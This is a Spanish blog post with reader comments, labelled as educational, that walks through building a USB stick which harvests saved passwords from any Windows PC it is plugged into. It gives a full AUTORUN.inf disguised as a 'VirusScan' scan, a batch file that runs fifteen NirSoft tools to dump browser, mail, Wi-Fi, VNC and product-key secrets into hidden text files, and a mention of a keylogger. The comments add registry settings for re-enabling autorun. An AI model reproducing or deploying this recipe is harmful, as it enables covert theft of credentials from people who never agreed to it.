Este post esta escrito con fines educativos y en la linea que estoy siguiendo de exponer los riesgos al introducir una memoria USB sin conocer su procedencia. Esta entrada explica como configurar una memoria USB para recuperar las contraseñas en el equipo que lo conectéis.
Como la mayoría sabéis, Microsoft Windows almacena todas las contraseñas que utilizáis en vuestra rutina diaria. Estas pueden provenir de vuestras cuentas de redes sociales, así como de las aplicaciones configuradas en vuestros equipos (Outlook, , SMTP, POP, FTP), todo eso sin contar de las que se almacenan teniendo la opción de auto-completar cuestionarios. Ademas incluye software Keylogger, que registrará en un archivo .txt todo lo que sea tecleado mientras el USB esté conectado al PC.
Las herramientas que vamos a utilizar para este propósito están disponibles en la pagina de nirsoft.
- Lo primero que debéis hacer es preparar vuestra memoria USB Para ello lo conectáis al equipo, lo seleccionáis y pulsáis con el botón derecho sobre la unidad elegís Formatear , podemos formatearlo en NTFS o FAT32 (este último es mas recomendado)
- Debéis abrir un editor de texto y copiáis lo siguiente:
[autorun]
open = launch.bat
UseAutoPlay = 1
ACTION = Escaneando con VirusScan
Renombráis el archivo con el nombre AUTORUN.inf y lo guardáis en la memoria USB.
- Volvéis al editor, abrís un nuevo documento, y copiáis lo siguiente:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
Renombráis el archivo como LAUNCH.bat y lo dejamos dentro del USB.
- En la página de Nirsoft y os descargáis las siguientes herramientas:
mspass.exe mailpv.exe iepv.exe pspv.exe PasswordFox.exe OperaPassView.exe ChromePass.exe Dialupass2.exe Netpass.exe WirelessKeyView.exe BulletsPassView.exe VNCPassView.exe OpenedFilesView.exe ProduKey.exe USBDeview.exe
Debéis descomprimirlas en la raíz del USB, y quedaría de la siguiente manera:
- Debéis descomprimir las herramientas y ocultar todos los archivos, al final todo quedaría así:
- Debéis habilitar la opción de autorun en vuestro equipo para realizar una prueba. Quitáis el USB del ordenador y lo volvéis a insertar para comprobar que funciona, si todo ha ido bien os aparecerán los siguientes .txt, que no hace falta que los abra porque ya se sabe lo que contienen, todas las contraseñas del sistema, incluidas las del WI-FI.
Espero que os haya resultado útil a la vez que os haya abierto los ojos a los riesgos que conlleva el uso no controlado de los dispositivos de almacenamiento USB.
Un saludo.
Lo he probado y funciona!!!
Pero ni el Chrome, Firefox, Dulipass, iepv, mailpv, mspass ni el passfox tienen un formato entendible, estan en .cfg, enpezando en [General].
Hay alguna forma de hacerlo legible?
Aparte, se peude aplicar esto mismo, lo que tu has posteado, con cualquier otro tipo de .exe?
Gracias
Sigo dandole bueltas, pero me dado cuenta que el autorun no funciona, que los ficheros que tenia eran de una ejecucion a mano. tengo igual que tu el codigo y nada. ademas, la cosa es que lee el auto run porque hacinedo algun cambion con el atributo «icon» si se consige cambiar el icono, pero nada mas. sabes porque puede ser¿
Hackituria,
Los archivos .cfg son archivos de configuración para los programas ejecutados. El nombre de producto, la descripción y el nombre de la compañía lo toma directamente del archivo .exe.
En cuanto a lo del autorun, la mayoría de sistemas lo traen deshabilitado para prevenir infecciones y ejecuciones maliciosas. Es mucho más fácil que funcione en Windows XP que en un Windows 7/8.
Para modificar las ejecuciones automáticas desde el registro puedes tratar de hacerlo desde:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
En el lado derecho debe estar el valor DWORD NoDriveTypeAutoRun, si no existe créalo y asígnale el valor hexadecimal que puedes calcular mirando la siguiente lista y sumando los valores que necesites:
Los valores más comúnmente usados son:
28 (40 decimal) deshabilita los medios extraíbles (USB)
3c (60 decimal) deshabilita medios extraíbles y CDROM
FF (255 decimal) deshabilita la reproducción automática
En Windows XP el valor predeterminado es 0x95 (149)
En Vista 0x91 (145) el mismo pero sin el floppy
Eliminando el valor NoDriveTypeAutoRun en la clave indicada se habilita todas las ejecuciones de forma automática.
Espero haberte ayudado.
Un saludo.
Ejecuto casi todo bien, pero hay algunos exe (los que obtienen las contraseñas de los navegadores), en los que se me muestra la interfaz del exe, y no me genera el txt, solo un cfg